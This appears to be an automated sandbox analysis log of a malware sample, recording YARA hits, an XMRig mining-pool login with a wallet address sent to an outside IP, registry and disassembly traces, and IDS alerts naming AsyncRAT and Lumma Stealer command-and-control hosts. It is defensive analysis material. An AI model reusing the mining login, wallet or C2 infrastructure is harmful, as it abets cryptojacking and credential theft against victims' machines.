Source: Yara match	File source: 14.2.AddInProcess.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.aspnet_compiler.exe.2089153ee30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.aspnet_compiler.exe.208910155f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2354734998.000000014079A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4611056195.000002DFC8099000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4611056195.000002DFC8038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4690508162.0000020890FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2354734998.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess.exe PID: 5320, type: MEMORYSTR

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.6:49730 -> 95.179.241.203:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 33 69 39 58 71 65 62 44 69 36 63 58 56 31 41 45 44 4c 77 62 4a 41 78 79 32 6f 72 6d 59 6a 34 4e 62 76 4e 42 35 4c 5a 44 75 37 54 57 6f 65 39 6f 72 65 76 66 73 5a 50 42 62 33 4c 74 53 62 50 55 58 62 76 39 62 7a 55 41 62 46 5a 69 52 4e 51 32 7a 66 69 67 65 44 5a 37 61 43 57 66 39 39 2e 52 49 47 5f 43 50 55 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 32 31 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 34 34 2e 32 20 6d 73 76 63 2f 32 30 31 39 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"43i9xqebdi6cxv1aedlwbjaxy2ormyj4nbvnb5lzdu7twoe9orevfszpbb3ltsbpuxbv9bzuabfzirnq2zfigedz7acwf99.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}

Found strings related to Crypto-Mining

Source: aspnet_compiler.exe, 00000009.00000002.4690508162.0000020890FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: aspnet_compiler.exe, 00000009.00000002.4690508162.0000020890FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: aspnet_compiler.exe, 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: XMRig 6.21.0

Source: PT54FFSL7ET46RASB.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.143.156:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.39.11:443 -> 192.168.2.6:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.39.11:443 -> 192.168.2.6:49780 version: TLS 1.2

Source: PT54FFSL7ET46RASB.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF419000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF491000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2202638035.000002EAE7500000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF419000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF491000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2202638035.000002EAE7500000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041B6EA FindFirstFileExW,

3_2_0041B6EA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [esi+0Ch]	24_2_0040F140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	24_2_0043F9B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-10h]	24_2_004402B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	24_2_004402B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	24_2_00440477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	24_2_00442EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], dx	24_2_0043FF03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	24_2_0043FF03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	24_2_0041B054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	24_2_0041B054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_0041B054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_0041B054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, FFFFFFFFh	24_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+14h]	24_2_00412001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi+01h], 00000000h	24_2_004230CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], bl	24_2_0040D140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_00423940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+48h]	24_2_0041A1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+64h]	24_2_004291C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esi+ebp+02h], 0000h	24_2_0042998F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, word ptr [ecx]	24_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, word ptr [edx]	24_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	24_2_00422200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_00426230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+48h]	24_2_0041AAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+14h]	24_2_004012F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_00428B4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_0040EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_0040EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	24_2_004193C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	24_2_00442380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_0043CC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	24_2_0041FCFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_00422480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	24_2_0041CC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	24_2_0041CC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	24_2_00440554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	24_2_00440554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h	24_2_00440554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [ebp-10h]	24_2_00441D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	24_2_00422D6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	24_2_00422D6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	24_2_0042CD06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	24_2_0042B510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	24_2_0043AD90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	24_2_0043D630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push eax	24_2_004386C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ebx	24_2_0040E6E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	24_2_0043C696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	24_2_004436A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	24_2_00405770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	24_2_0042AFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+10h]	24_2_004247E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+10h]	24_2_004247E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	24_2_00409F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	24_2_00409F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	24_2_004287AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	24_2_004357B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 45.11.229.96:56001 -> 192.168.2.6:49712
Source: Network traffic	Suricata IDS: 2055879 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop) : 192.168.2.6:55806 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055880 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI) : 192.168.2.6:49780 -> 104.21.39.11:443
